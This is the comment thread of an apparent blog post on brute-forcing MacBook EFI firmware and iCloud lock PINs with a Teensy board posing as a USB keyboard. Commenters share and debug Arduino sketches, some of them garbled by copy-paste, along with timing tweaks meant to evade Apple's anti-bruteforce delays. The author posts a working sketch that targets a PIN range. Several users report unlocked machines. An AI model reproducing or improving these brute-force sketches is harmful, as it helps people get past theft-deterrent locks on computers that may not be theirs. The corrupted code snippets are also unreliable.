    http://orvtech.com/en/howto/atacar-efi-pin-macbook-pro/

    ****MODDED By ME To Add LCD****
    Set pins for LCD HD44780 display

    * LCD RS pin to digital pin 23
    * LCD Enable pin to digital pin 22
    * LCD D4 pin to digital pin 16
    * LCD D5 pin to digital pin 15
    * LCD D6 pin to digital pin 17
    * LCD D7 pin to digital pin 4
    * LCD R/W pin to ground
    */

    // Taken from http://darcade.de/electronics/connecting-teensy-3-0-lcd-hd44780-display
    // The next line sets pins to use on Teensy 3.0 ***Note: I changed pin assignment from above website post on last 2 pins so ovrtechs code still use pin 13 for LED
    LiquidCrystal lcd(23, 22, 16, 15, 17, 4);
    //****MODDED By ME To Add LCD****

    const int ledPin = 13; // choose the pin for the LED

    int counter = 0;

    int fakecounter = counter;

    char pin[]="xxxx";

    void setup() {

    pinMode(ledPin, OUTPUT); // declare LED as output

    delay(10000);

    //****MODDED By ME To Add LCD****
    // set up the LCD's number of columns and rows:
    lcd.begin(16, 2);
    // Ex. set the cursor to column 0, line 1
    // Ex. (note: line 1 is the second row, since counting begins with 0):
    // Ex. lcd.setCursor(0, 1);
    // Hopefully next command prints characters on 1st row starting at 1st Position
    lcd.setCursor(0, 0);
    //****MODDED By ME To Add LCD****

    }

    void loop(){

    keyboard_modifier_keys = 0;

    if (counter 9999){

    for (int blinkies = 0; blinkies < 8; blinkies++) {

    digitalWrite(ledPin, HIGH);

    delay(20);

    digitalWrite(ledPin, LOW);

    delay(200);

    }

    delay(6000);

    }

    ++counter;

    fakecounter = counter;

    }

    • This is awesome!

      Thanks so much for sharing this

    • Sam Khan

      Hi PCTECH101,

      This code with the lcd module does not work. Do you have an alternative version.

      Thanks.

  89. GStro

    I inserted your updated code and it shows it typing 0000 etc, then after 2 tries my computer tells me to wait 5 minutes and the code jumps to 0008 for the next attempt. Is that normal?

    • ALNNN

      Check what code are you using, because the EFI brute force is different from the ICLOUD brute force (this one has a lot more delay) probably you are using the wrong code…

  90. Kingkong

    What the are steps to do after the unlock iCloud or EFIN?
    1. format the drives
    2. reinstall Mac OS X

    • I would assign a new PIN, format drives, reinstall and take the seller to a small court to get your money back

  91. Henry

    Thank you very much Orvtech.
    Just unlocked one Cus. macbook. PIN 4280

    Thank you guys all

  92. Apple Tech

    woohoo i finally got everything working (days and days) but i finally got this dam thing to run the way i wanted it to BTW the code was 3733

  93. Luinux

    Como suele decir mi hijo, “Eres un Genio”, agradecido totalmente, use tu código actualizado y después de algunas horas de labor, salio el Pin, thanks again.

  94. Miguel Angel Ruiz

    Conseguido!! Muchisimas gracias Orvtech!!
    PIN 3142, Macbook Air 11 , 2011, 2 days.
    Primero probe el codigo de la EFI, por ser mas rápido que el de iCloud, y al no tener la seguridad si despues de averiguar el de iCloud tendria que averiguar también el de EFI.
    Como mi tiempo era reducido, modifique el codigo para ir de 1000 in 1000, los ratos que estaba en casa y fue perfecto calculando unos 17,5 segundos por cada intento.
    Una vez averiguado el PIN EFI 3142, puse el mismo número en el bloqueo de iCloud, y voilà!
    La pantalla paso a negro unos segundos y despues volvio arrancando con el usuario con normalidad, working!
    Tengo que deciros que una vez puesto el PIN en el password de iCloud y desbloquearlo también se elimino el password del EFI y ya no lo solicitaba mas, por lo tanto estan asociados, aparte de ser el mismo numero, y al desbloquear el iCloud, desbloqueas el EFI, pero no al reves (el PIN del EFI no desbloquea el iCloud)
    Por lo tanto, si desbloqueas desde iCloud y te sigue pidendo password despues el EFI, quiere decir que el password EFI era anterior al iCloud y diferente, c’est la vie!
    Habria que pensar entonces en la solucion de K1ng, para resetear el chip.
    Nada mas, muchas gracias por compartir y es pero que mi experiencia también ayude un poco, un saludo desde Colmenar, Madrid, Spain! ;)

  95. Àlex

    GRACIAS Oliver!!! Funcionó, perfectamente, Después de unas 30 hours, al fin lo saqué!!
    Ahora a investigar que más se puede hacer con el teensy 3.0

  96. sd.mhrg

    I want to know if the EFI code shoud a 4 digital code ? or it can be more (6 digit) ?
    I tried to unloock it with overtech teensy code and it did not work ! I think that my EFI code is not a 4 digital code !!! What should I do ???

  97. EVASOFT

    HOLA:
    primero que nada gracias, pude hacer funcionar el leonardo en el icloud pero no en el efi, caundo lo pruebo en un block de notas funciona muy bien pero la maquina parece no soportarlo. aqui como lo modifique…..

    const int ledPin = 13; // choose the pin for the LED
    int counter = 0;
    int fakecounter = counter;
    char pin[]=”xxxx”;
    void setup() {
    pinMode(ledPin, OUTPUT); // declare LED as output
    delay(10000);
    }
    void loop(){
    if (counter 9999){
    for (int blinkies = 0; blinkies < 8; blinkies ) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
    }
    delay(6000);
    }
    ++counter;
    fakecounter = counter;
    }

  98. EVASOFT

    HOLA:
    primero que nada gracias, pude hacer funcionar el leonardo en el icloud pero no en el efi, caundo lo pruebo en un block de notas funciona muy bien pero la maquina parece no soportarlo. aqui como lo modifique…..

    const int ledPin = 13; // choose the pin for the LED
    int counter = 0
    int fakecounter = counter;
    char pin[]="xxxx";
    void setup() {
    pinMode(ledPin, OUTPUT); // declare LED as output
    delay(10000);
    }
    void loop(){
    if (counter 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
    }
    delay(6000);
    }
    ++counter;
    fakecounter = counter;
    }

    • No entiendo algo.. te funciona actualmente al 100%? otra cosaestas atacando el EFI o el iCLoud?

  99. Snubba

    Ive followed all the instructions and read all the comments I have been waiting for about a day and a half as my teensy went through all the combos, it has hit all 10,000 combinations (unless it skipped some while I wasnt watching) but its hasnt cracked the code yet. any idea what the [problem might be?

    • You still need one more day to go through all numbers, it takes little over 2 days.

  100. Kevin a

    Has anybody gotten to work have teensey 2.0 and a 3.0 where can I get right code for EFI unlock
    Thanks

  101. G Stump

    UPDATE

    Oliver,

    I guess I did get it working for a few minutes! As someone above already mentioned, after the first 5 attempts the wait time is 1 minute. Then 5 minutes, then 15 minutes but the Teensy 3 does not appear to be waiting. it appears to just keep imputing numbers because after the first 5 inputs and 5 minutes of waiting it was at like 0026. Please help if you have any idea what I am doing wrong!

    GS

  102. NEHEMIAS

    Hola buenas, soy nuevo en esto y necesito ayuda, e comprado un treensy 3 y no tengo idea como poner los codigo, si me podeis ayudar por favor, Thanks

    • Usa Teensyduino SDK.

  103. Snubba

    I must agree with the above comment, im not sure why if it is , skipping numbers…
    I have let the teensy run now, today is day 3, it seems it has started all over again repeating the numbers and I still havent found the code. The fact that you even still reply to these is a blessing! lol Is there something maybe wrong in the code? I dont get any errors on it…..
    #include
    // This code is licensed under Apache 2.0 License
    // http://www.apache.org/licenses/LICENSE-2.0.txt
    // Limitation of Liability. In no event and under no legal theory,
    // whether in tort (including negligence), contract, or otherwise,
    // unless required by applicable law (such as deliberate and grossly
    // negligent acts) or agreed to in writing, shall any Contributor be
    // liable to You for damages, including any direct, indirect, special,
    // incidental, or consequential damages of any character arising as a
    // result of this License or out of the use or inability to use the
    // Work (including but not limited to damages for loss of goodwill,
    // work stoppage, computer failure or malfunction, or any and all
    // other commercial damages or losses), even if such Contributor
    // has been advised of the possibility of such damages.
    // This code is indented for people who are not able to contact
    // apple support and I am in no way liable for any damage or
    // problems this code might cause.
    const int ledPin = 13;
    int counter = 0;
    //waits for iCould
    int firstloop = 0;
    int secondloop = 0;
    int thirdloop = 0;
    boolean firstcompleted = false;
    boolean secondcompleted = false;
    int fakecounter = counter;
    char pin[]=”xxxx”;
    void setup() {
    pinMode(ledPin, OUTPUT);
    delay(10000);
    digitalWrite(ledPin, LOW);
    }
    void loop(){
    keyboard_modifier_keys = 0;
    //lets wait 1minute and 1 second
    if (firstloop >= 5){
    delay(61000);
    firstcompleted = true;
    digitalWrite(ledPin, LOW);
    }
    else if ((firstloop = 1) && (secondcompleted == false) && (firstcompleted == true)){
    delay(301000);
    secondloop = 0;
    secondcompleted = true;
    digitalWrite(ledPin, LOW);
    }
    else if ((secondloop = 1) && (secondcompleted == true)){
    delay(901000);
    thirdloop = 0;
    secondcompleted = false;
    firstcompleted = false;
    firstloop = 0;
    secondloop = 0;
    thirdloop = 0;
    digitalWrite(ledPin, LOW);
    }
    else if ((thirdloop < 1) && (secondcompleted == true)){
    ++thirdloop;
    digitalWrite(ledPin, LOW);
    }
    //lets get to work
    if (counter 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
    }
    delay(6000);
    }
    ++counter;
    fakecounter = counter;
    }

    ^that is the one I have been using to unlock the ILOCK screen with the apple and the 4 digit boxes.

    Thanks again!

    • The fact that most of the comments refer tothe right code”, means that a significant percentage of people are not reading through the blog post (not your case) and another part are getting the code corrupted while ctrl+c/ctrl+v the code.

      I think the best way out of these problems is to create a Git repo and code reading there so that we as a community can contribute , change it and always working version of this so that you can easily download and share .

      I firmly time at the moment and have no more than apple car, so I'll try to do a dry test on black text document and upload it soon .

      If I were you, I would do a dry test run on a notepad and try to see if it is actually skipping numbers or if a timer needs to be incremented somewhere. Also make sure you are using the proper code. there are 2, one for the EFI screen another one for the iCloud screen which is the most complex, slow and easy to get it wrong. The one on this page is for the EFI, not the iCloud.

  104. Snubba

    Good morning ORVTECH.
    . I TOOK your advice and ran the code in a blank TXT document to see if it was in fact skipping numbers. IT IS!!! the mistake happens when you reach the next set of numbers
    {first example, 0096,0097,0098,0099, 1100} so right off the bat it skips 0100-1099….next skip occurs right before 2000 {1198,1199,2200,2201} so it skipped 1200-2199 alot more numbers than the first.
    The Next skip is 2297,2298,2299,3300……….
    as you can guess by now the next skip is 3397,3398,3399,4400, skippin 3400-4399.
    next skip is 4498,4499,5500,5501 ( the pattern is obvious, WHY its skipping these numbers is beyond me I have no experience in coding and would not know how to change it)

    once it gets to the end where the next HUNDRED would begin, (5599 instead of going to 5600 it moves to the next thousand 6600) and does that for the remainder of the code.

    Thank you for your time and cooperation!

    P.S. I think all the confusion comes from people reading every single post like I did, we copy a code….continue reading then it seems like people are changing the code, adding things to it, posting links for different codes, how to add a screen code and all that is confusing people. If I were you I would just delete ALOT of comments lol

    • Ohh I remember that bug, it was because I was sending pin[1] twice.if you keep reading towards the button you will see that the code is first sending pin[0] then it sends pin[1]

  105. Ibrahiem Khatib

    Thank you for your efforts Orvtech! I greatly appreciate it. I wanted to ask one thing. I don’t have access to a teensy, but have this device ATAVRXPLAIN/EVALUATION KIT FOR ATXMEGA128A/Atmel is this code usable on this device? Sorry if this seems silly, but I am not a programmer :)

    • It needs to be compatible with the Arduino SDK and support USB in HDI mode

  106. JEROME

    Hello

    is there a way to reduce waiting times between attempts ? it takes about 17 s for each code . did you try to reduce values ?

    gonna test it . i will leave feedback

    • I think you can reduce almost 1 second but it might result in missed attempts since it would be too fast to fool apple anti-bruteforce logic. We (me and the hackmack, macrumors, hackaday communities) did lots of testing around this to make it work for most people.

  107. jean rivera

    Hello, I am trying to brute force now, is it important to know the PIN after its entered?
    Also, after that i am suppose to do an internet recovery? and if thats all i gotta do?

    Thanks in advanced.

    • Here is the thing, you will need to enter the PIN twice, one for the EFI lock and another for the iCloud lock.

      I am not sure what an internet recovery is but TBH I would just do a clean reinstall and assign a new PIN my self

    • tony

      internet recovery would relock it again i learned that the hard way .. you need to have a flash drive made already

      • Before connecting to the web, did you try to re-asigning a new PIN?

        The procedure should be:

        1. Bruteforce EFI/iCloud lock
        2. Assign new EFI PIN Lock
        3. Format
        4. Reinstall
  108. Danius

    Hey.

    Big thanks to orvtech for a nice idea and coding.

    To give my little input, the worst case scenario of finding a correct PIN and unlocking in EFI mode takes way more than 20 hours.
    8 seconds delay is only between the key “ENTER” press and the start of the other digit input. But the whole input needs to be calculated slightly different. To make it easy, everything is put in the LOOP, which inputs 4 digits and does all the waiting at the start and between all digits, to simulate human input. So we need to calculate all the delays in that loop and multiple by all possible inputs – 10000. Here are all the delays in the loop:

    delay(8000);
    delay(5500);
    delay(450);
    delay(420);
    delay(398);
    delay(510);
    delay(421);
    delay(423);
    delay(430);
    delay(525);
    delay(305);

    All these are in milliseconds, here is the sum in seconds:

    8 + 5.5 + 0.45 + 0.42 + 0.398 + 0.51 + 0.421 + 0.423 + 0.43 + 0.525 + 0.305 = 17.382 s.

    That is 17.382 seconds between two inputs. That is:

    60 / 17.382 = 3.451846738004833 (inputs per minute)
    60 x 3.451846738004833 = 207.11080428029 (inputs per hour)
    10000 / 207.11080428029 = 48.28333333333332 (hours to input 10000 inputs)

    So, the worst case scenario is going to take roughly 48h 16m 48s.

    I believe, orvtech already mentioned that somewhere. I just wanted to fix the mistake made by somebody, cannot remember who. But it is good to know the exacts :)

    The next for me is to try LCD module to show the current input digits that pctech101 suggested. This little project is very interesting! :)

    • Hey Danius,

      Thank you for jumping in and clearing things out. I have found that most people confuse this code with the one for the iCloud padlock which would take considerably longer.

      Please let us know about that LCD integration when you get it done

      • Sam

        Any news on the LCD integration?

        • I suggest you start to work on this instead of asking on ETAs.

  109. Gabo

    Hola Oliver, ya compre mi teensy, lo programe con tu código actualizado y funciono perfectamente mandando los 4 dígitos a su tiempo. En la pantalla de desbloqueo donde aparecen 4 espacios después de 3 días de búsqueda termino el conteo en 9999 y no lo encontró nunca.
    Note: El disco duro fue formateado al parecer intentando eliminar el bloqueo del disco duro.
    ¿Cual crees que sea mi problema?
    Por otro lado, volví a reiniciar sosteniendo la tecla Opcion y ahora me aparece una pantalla donde tengo que introducir un código sin limite y volví a iniciar el proceso de introducción de códigos.

    • La pantalla que muestra 4 campos es la del iCloud. La que muestra una que permite introducir muchos mas es la del EFI. El código de este artículo es para esta última (El EFI Lock). Empieza de nuevo atacando el EFI Lock.

  110. rtdarling

    Orvtech –

    Firstly, thank you for all of your work/time you have put into this, it is greatly appreciated.

    Secondly, I have a 13″ MacBook Pro (Early 2011 series), which has an EFI password. When I boot the machine, while holding down the “option/alt” key, I get a lock symbol with a single password field below it (NOT 4 separate boxes). I have purchased a Teensy 3.0 & I believe successfully programmed it with your code (thank you), & the teensy finds/inputs the correct password exactly 12 hours & 54 minutes (or 774 minutes) after the attack has started (I have done it 3 separate times, & each time it inputs the correct password exactly 12 hours & 54 minutes [or 774 minutes] into the attack). Which, according to the Excel spreadsheet/calculator (created by someone explicitly for calculating what the EFI password should be for your attack/code), my password should be 2322, 2323, or 2324. However, I have tried every password between 2315 ➔ 2335 (twice each) without success.

    Therefore, my question(s) to you (or anyone else out there, whom might be able to help) are as follows:

    1. Am I doing something wrong in my calculation regarding what the password should be (i.e: is there a possibility that the password could be something other than the 20 qty passwords I have already tried [twice each]) ?
    2. If I am sitting in front of the machine/MacBook Pro when the Teensy 3.0 inputs the correct password, is it possible to permanently remove the EFI password/lock at that moment/time (without actually knowing what the password actually is) ? If yes, is it possible for you (or anyone/someone else) to provide an exact/step-by-step procedure/instructions as to how one might execute this task (please be as specific as possible) ?
    3. I understand that some people have: A) Hooked up an external LCD panel, B) Programed a USB flash drive (w/some sort of a text document), or C) Any other method, which allows/enables one to see what password(s) the teensy/code is inputting/entering (& therefore if one is sitting in front of the machine, when the correct password in input/entered, I will know/see what the correct/exact password is). Therefore, my question is: Is it possible for you (or anyone else whom has this knowledge, & is willing to share it) provide a list of the exact hardware & software/application(s) required to perform/achieve this (note: am currently on a Mac, running OS 10.5.8, but can find/get access to either a mac running any OS [up to OS 10.9] or a PC [running Windows 7 or 8], if necessary), as well as a step-by-step procedure/instructions as to how one might set this up/configure such a solution

    **Please note: Please allow me to assure you, that any/all information (if provided) will only be utilized to crack/obtain the EFI password for the above mentioned/discussed machine/MacBook Pro, & will not [now, or ever] be utilized in any way for personal financial gain/profiting/making money. If someone/anyone does not believe me, I hereby state/promise that if any person, ever gets word/has evidence of myself attempting to make/earn /profit even a single Dollar, Peso, Yen, Pound Sterling, etc. with/from this information, they can come hunt me down (I am in Seattle, WA, USA) & force me to pay Orvtech $10,000 US Dollars immediately (payable via PayPal).

    UPDATE:
    Orvtech –

    A follow up/update on the above post: I just opened a Text Edit (mac word processing application) document & plugged in my Teensy 3.0, & here is what happened/occurred:

    Plugged in Teensy 3.0 at 05:36:00

    22 seconds later (at 05:36:22) it started inputting/entering it’s first code:

    00000000000000000000000000000000
    00000000000000000000000011111111
    00000000000000000000000022222222
    00000000000000000000000033333333
    00000000000000000000000044444444
    00000000000000000000000055555555
    00000000000000000000000066666666
    00000000000000000000000077777777
    00000000000000000000000088888888
    00000000000000000000000099999999
    00000000000000001111111100000000
    00000000000000001111111111111111

    At 05:39:36 (3 minutes & 36 seconds after I plugged in the teensy, & 3 minutes & 14 seconds after it began entering it’s first code) it finished entering the last code in the above string (00000000000000001111111111111111) & I unplugged the Teensy.

    Does this look right/correct to you (i.e: do you believe that I have my Teensy 3.0 programmed correctly) ?

    If you do not believe that my Teensy 3.0 is programmed with your code correctly, is it possible for you to provide step-by-step instructions as to exactly how I can re-program/re-upload the code to it so as to get it to work correctly (please be as specific as possible, as I am a complete/total ignoramus/newbie) ?

    Thanks again for all of your time/efforts, they are truly greatly appreciated.

    rtdarling
    Seattle, WA

    • You have a typo in your codeyou should not be entering “00000000000000000000000000000000″ but “0000″

  111. AK

    Hello overtech, I tried using the code you had published and followed your instructions. I am using the Arduino to open the code, and then I verify/compile to add into Teensy. the code gets downloaded into the Teensy and it shows Download Complete. I turn on my mac, I hold down the option button and then connect the USB and press the button but the USB does not run, the Light is not blinking. Is there an extra step I need to do ? a little explanation would be very helpful

    • Did you test it on a notepad?

  112. Anthony Cruz

    Success!!! Pass was 8558. Ifi pass and icloud pin were the same. Uploaded in batTches of 1,000. screen recording right after the passage of a tiny EFI was introduced just to dial in ICloud box pin and I just try to enter 5 previous combinations and there it was. Thank uu

  113. Luis

    funcionando llego al codigo 5138 in 20 hours 7 minutes now do not know what else xD as I reinstall osX mountain lion?

  114. Coded the mouse movements for a MB AIR 13 – X and Y coordinates varies if the screen is bigger or smaller (easy to recode them there). I hope it’s clear to understand. WORKS flawlessly for me !

    #include
    const int ledPin = 13;
    int counter = 1000;
    int fakecounter = counter;
    char pin[]=”xxxx”;
    void setup() {
    pinMode(ledPin, OUTPUT);
    delay(1000);
    }
    void limba() {
    keyboard_modifier_keys = 0;
    int i;
    for (i=0; i<200; i++) {
    Mouse.move(-4, -4);
    delay(10);
    }
    for (i=0; i<300; i++) {
    Mouse.move(1, 0);
    delay(10);
    }
    Mouse.click();
    delay(800);

    for (i=0; i<80; i++) {
    Mouse.move(0, 1);
    delay(10);
    }

    Mouse.click();
    delay(2000);

    keyboard_keys[0] = KEY_ENTER;
    usb_keyboard_send();

    delay(550);
    //going to cancel on wireless
    for (i=0; i<170; i++) {
    Mouse.move(0, 2);
    delay(10);
    }
    // right to the wireless cancel
    for (i=0; i<450; i++) {
    Mouse.move(1, 0);
    delay(10);
    }
    Mouse.move(-3,0);
    delay(2000);
    Mouse.click(); // la cancel-ul de la wifi
    delay(500);
    Mouse.click();
    delay(200);
    Mouse.click();// pentru a introduce coduri
    Mouse.move(0,-25);
    delay(1000);
    Mouse.click();// pentru a introduce coduri

    }

    void loop(){
    keyboard_modifier_keys = 0;
    if (counter 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
    }
    delay(750);
    }
    ++counter;
    fakecounter = counter;
    }

  115. Sarah

    Hi orvtech, thank you so much for this guide. I ran the EFI version of the code while I sleep and when I woke up, the computer restarted. This happened twice. Does that mean that I got into my computer at one point but perhaps the lack of use triggered to restart?

    • Yes, do you know how many hours was it running the last time you saw it was locked and how many when you noticed it had restarted?

  116. Sarah

    I noticed that the computer restarted between 8 to 11 hours. As Darius mention above, it takes 17.382 seconds in between 2 inputs, thus @ 8 hour, my input should be at 1656 ( 28800s/17.382). So just to be save, I changed my counter to 1600. Can you confirm that my logic is correct? Thanks in advance.

    • I would concentrated in the 1600-2350 range

      • Anaruz

        Hello

        I want to know the method to calculate the pin code efi pleasez.
        I use a teensy and the code was found in 15 hours and 47 minutes.

        Thanks

  117. Anaruz

    Hello

    I want to know the method to calculate the pin code efi pleasez.
    I use a teensy and the code was found in 15 hours and 47 minutes.

    Thanks

  118. Catalin Hammer

    Hello there, very good info, used teensy 3.0 and second sketch from the top, done imac with efi bruteforce, code found in 8 hours. code 1601 Thank you!!

  119. Anaruz

    Hi Orvtech

    My code was found in 15 hours and 47 minutes i calculate with your method

    Orvtech
    (((15×60)+47)x60)/18= 3156
    (((15×60)+47)x60)/17= 3342

    Darius
    ((15×60)+47)x3.45= 3267 (it is more accurate)

    My EFI code is between 3156 to 3342 so I change the code

    #include
    // This code is licensed under Apache 2.0 License
    // http://www.apache.org/licenses/LICENSE-2.0.txt
    // Limitation of Liability. In no event and under no legal theory,
    // whether in tort (including negligence), contract, or otherwise,
    // unless required by applicable law (such as deliberate and grossly
    // negligent acts) or agreed to in writing, shall any Contributor be
    // liable to You for damages, including any direct, indirect, special,
    // incidental, or consequential damages of any character arising as a
    // result of this License or out of the use or inability to use the
    // Work (including but not limited to damages for loss of goodwill,
    // work stoppage, computer failure or malfunction, or any and all
    // other commercial damages or losses), even if such Contributor
    // has been advised of the possibility of such damages.
    // This code is indented for people who are not able to contact
    // apple support and I am in no way liable for any damage or
    // problems this code might cause.
    const int ledPin = 13; // choose the pin for the LED
    int counter = 0;
    int fakecounter = counter;
    char pin[]=”xxxx”;
    void setup() {
    pinMode(ledPin, OUTPUT); // declare LED as output
    delay(10000);
    }
    void loop(){
    keyboard_modifier_keys = 0;
    if (counter 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) {
    digitalWrite(ledPin, HIGH);
    delay(20);
    digitalWrite(ledPin, LOW);
    delay(200);
    }
    delay(6000);
    }
    ++counter;
    fakecounter = counter;
    }

    it's okay?

    thanks

    • The short answer is No, code should look something like this :

      #include
      // This code is licensed under Apache 2.0 License
      // http://www.apache.org/licenses/LICENSE-2.0.txt
      // Limitation of Liability. In no event and under no legal theory,
      // whether in tort (including negligence), contract, or otherwise,
      // unless required by applicable law (such as deliberate and grossly
      // negligent acts) or agreed to in writing, shall any Contributor be
      // liable to You for damages, including any direct, indirect, special,
      // incidental, or consequential damages of any character arising as a
      // result of this License or out of the use or inability to use the
      // Work (including but not limited to damages for loss of goodwill,
      // work stoppage, computer failure or malfunction, or any and all
      // other commercial damages or losses), even if such Contributor
      // has been advised of the possibility of such damages.
      // This code is indented for people who are not able to contact
      // apple support and I am in no way liable for any damage or
      // problems this code might cause.
      const int ledPin = 13;
      int counter = 3156;
      int fakecounter = counter;
      char pin[]="xxxx";
      void setup() {
      pinMode(ledPin, OUTPUT);
      delay(10000);
      }
      void loop(){
      keyboard_modifier_keys = 0;
      if (counter < = 3342){
      delay(8000);
      digitalWrite(ledPin, LOW);
      delay(5500);
      digitalWrite(ledPin, HIGH);
      sprintf(pin, "%04d", fakecounter);
      Keyboard.press(pin[1]);
      delay(450);
      Keyboard.release(pin[1]);
      delay(420);
      Keyboard.press(pin[1]);
      delay(398);
      Keyboard.release(pin[1]);
      delay(510);
      Keyboard.press(pin[2]);
      delay(421);
      Keyboard.release(pin[2]);
      delay(423);
      Keyboard.press(pin[3]);
      delay(430);
      Keyboard.release(pin[3]);
      delay(525);
      Keyboard.press(KEY_ENTER);
      delay(305);
      Keyboard.release(KEY_ENTER);
      }
      //reached 4 digit PIN max value
      if (counter > 3342){
      for (int blinkies = 0; blinkies < 8; blinkies++) {
      digitalWrite(ledPin, HIGH);
      delay(20);
      digitalWrite(ledPin, LOW);
      delay(200);
      }
      delay(6000);
      }
      ++counter;
      fakecounter = counter;
      }

  120. Anaruz

    Thanks! progressively i advance…

    Now i know to upload the script in the Teensy :) and work in notepad (windows) but befor update with your script
    Force have CAPS LOCK (000 0001 0001…) or if I have not engaged CAPS LOCK (àààà ààà& àààé…) but it worked for hack efi

    Now the efi code don’t found ….i think teensy tried (àààà ààà& àààé….)

    Is what i need to active CAPS LOCK of my macbook?

    • Not sure, if I were you, I would try it first in Notepad and let it run for an hour to see if it does what it is expected to do .

  121. Catalin Hammer

    here is my lil project .

  122. Микки

    Could someone please help me connecting the display HD44780 or display 1602A with teensy 3.0?

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Comment moderation is enabled. Your comment may take some time to appear.